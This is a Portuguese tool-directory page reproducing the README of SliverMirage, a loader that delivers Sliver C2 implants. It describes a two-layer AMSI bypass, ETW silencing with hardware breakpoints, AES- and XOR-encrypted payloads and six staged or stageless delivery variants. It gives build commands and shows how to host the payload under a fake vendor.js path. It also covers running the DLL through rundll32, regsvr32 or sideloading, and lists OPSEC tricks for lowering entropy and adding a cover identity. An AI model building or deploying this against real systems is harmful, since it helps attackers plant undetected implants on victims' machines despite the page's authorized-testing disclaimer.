Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SliverMirage — Crystal Palace PICO loader para Sliver C2 bypass de AMSI em duas camadas, silenciamento de ETW, payloads criptografados com AES-256-CBC, 6 variantes de entrega | Kitploit
Ferramentas/GitHubGitHub/daniomass/slivermirage
ExploraçãoPós-ExploraçãoAnálise de MalwareComando e ControleAnálise de BináriosRed TeamingDesenvolvimento de Payloads
GitHubdaniomass/slivermirage

SliverMirage

Crystal Palace PICO loader para Sliver C2 bypass de AMSI em duas camadas, silenciamento de ETW, payloads criptografados com AES-256-CBC, 6 variantes de entrega

Ver Repositório
154há 5 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

SliverMirage

Um fork do CrystalSliver, estendendo o loader PICO do Crystal Palace com bypass de AMSI em duas camadas, silenciamento de ETW e seis variantes de entrega para o Sliver C2.

O que ele faz

O SliverMirage encapsula uma DLL de implante do Sliver através da virtualização PICO do Crystal Palace e a entrega por meio de um loader que neutraliza AMSI e ETW sem aplicar patch em amsi.dll ou ntdll.dll.

Pilha de evasão:

CamadaTécnicaDetalhe
AMSI L1Corrupção de strings do CLRLdrRegisterDllNotification intercepta o carregamento de clr.dll, corrompe AmsiScanBuffer em .rdata antes que o CLR chame GetProcAddress
AMSI L2VEH + HWBPO Vectored Exception Handler em AmsiScanBuffer retorna E_INVALIDARG
ETWHWBPDR1 em NtTraceControl, retorna STATUS_SUCCESS
PayloadAES-256-CBC + XORDescriptografia BCrypt, VirtualAlloc(RW) -> VirtualProtect(RX), zero RWX
VirtualizaçãoCrystal Palace PICOA DLL do Sliver é executada dentro de um processo PICO, invisível para o AV no espaço do usuário

Variantes

FormatoArquivoEntregaC2 em tempo de execução?
exeEXE StagedEXE + payload.dat no site do C2Sim (HTTPS)
exe-stagelessEXE StagelessEXE únicoNão
dllDLL StagelessDLL únicaNão
dll-stagedDLL StagedDLL + payload.dat no site do C2Sim (HTTPS)
shellcodeShellcode Staged.bin + payload.datSim (HTTPS)
shellcode-stagelessShellcode Stageless.bin únicoNão

As variantes Staged baixam o PICO criptografado em tempo de execução de um site HTTPS do Sliver. O EXE/DLL é pequeno (~20 KB) e não carrega payload em disco.

As variantes Stageless incorporam o PICO criptografado em tempo de compilação (dupla camada XOR + AES). São maiores em disco, porém com zero atividade de rede antes do callback do beacon.

Início rápido

Pré-requisitos

  • x86_64-w64-mingw32-gcc (mingw-w64)
  • nasm
  • python3 com pefile (pip install pefile)
  • openssl
  • Java 17 (para o Crystal Palace — provisionado automaticamente pelo build.sh)

Compilar com build.sh (recomendado)

O script de build provisiona automaticamente as dependências ausentes (incluindo Crystal Palace e Java 17) e cuida de todo o pipeline: DLL -> PICO do Crystal Palace -> criptografar -> compilar.

root@kitploit:~
# Staged EXE (padrão)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# Stageless EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# Stageless DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# Staged DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode (staged)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode (stageless)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

Opções:

  • --dll <path> — DLL do implante do Sliver (obrigatório)
  • --host <ip> — IP do servidor C2 (obrigatório para formatos staged)
  • --port <port> — Porta do C2 (padrão: 443)
  • --path <path> — Caminho da URL para download do payload (padrão: /assets/js/vendor.js)
  • --format <fmt> — Formato de saída (padrão: exe)
  • --export <name> — Nome de exportação personalizado da DLL

Compilar com Make (manual)

Se você já possui um blob PICO do Crystal Palace:

root@kitploit:~
# Staged EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# Stageless EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# Stageless DLL
make dll PICO=/path/to/implant.crystal.bin

# Todos os alvos
make clean

Implantação

Staged (EXE ou DLL)

  1. Envie build/payload.dat para um site HTTPS do Sliver:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. Entregue build/csvchelper.exe (ou .dll) ao alvo.

Stageless

Entrega em um único arquivo. Não é necessário configurar um site C2.

Métodos de execução da DLL

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

Ou use sideloading de DLL (renomeie para corresponder a uma DLL legítima que o aplicativo de destino carrega).

Exportações: DllRegisterServer, DllUnregisterServer, StartW, VoidFunc

Estrutura do projeto

root@kitploit:~
SliverMirage/
  loader/                    # Loader PICO do Crystal Palace (do CrystalSliver)
    src/                     # Códigos-fonte C do loader + ASM draugr
    loader.spec              # Especificação de linker do Crystal Palace
    pico.spec                # Especificação de geração PICO
  src/
    stager_remote.c          # EXE Staged
    stager_stageless.c       # EXE Stageless
    stager_remote_dll.c      # DLL Staged
    stager_stageless_dll.c   # DLL Stageless
    stager_debug.c           # EXE de depuração (diagnóstico via MessageBox)
  scripts/
    gen_payload.py           # Criptografia AES-256-CBC (staged)
    gen_payload_stageless.py # Incorporação AES + XOR (stageless)
    dll_to_shellcode.py      # Conversor sRDI de DLL para shellcode
  resources/
    resource.rc              # Informações de versão (EXE)
    resource_dll.rc          # Informações de versão (DLL)
    manifest.xml             # Manifesto asInvoker
  libtcg.x64.zip             # Biblioteca TCG para o Crystal Palace
  Makefile
  build.sh

Notas de OPSEC

  • IAT limpa: apenas kernel32, advapi32, bcrypt — todas são APIs legítimas do Windows
  • Sem patches de memória: o bypass de AMSI/ETW usa breakpoints de hardware, não VirtualProtect em DLLs do sistema
  • Sem RWX: a memória do payload vai de RW -> RX, nunca RWX
  • Subsistema GUI: ponto de entrada WinMain, -mwindows — sem flash de console
  • Informações de versão + manifesto: o manifesto asInvoker incorporado suprime heurísticas de UAC
  • Controle de entropia: payloads stageless usam chave rotativa XOR para reduzir a entropia de ~7,8 para ~6,0-6,5
  • Personalize resource.rc / resource_dll.rc com sua identidade de cobertura antes de compilar

Aviso legal

Este projeto destina-se exclusivamente a testes de segurança autorizados, pesquisa e fins educacionais. Use-o apenas em ambientes onde você tenha permissão explícita por escrito para realizar testes de penetração. O acesso não autorizado a sistemas de computador é ilegal. Os autores não assumem responsabilidade pelo uso indevido deste software.

Créditos

  • Crystal Palace por Rasta Mouse — mecanismo de virtualização PICO
  • CrystalSliver — integração original Crystal Palace + Sliver
  • sRDI por Nick Landers — técnica de injeção reflexiva de DLL via shellcode

Licença

MIT

Baixar ferramenta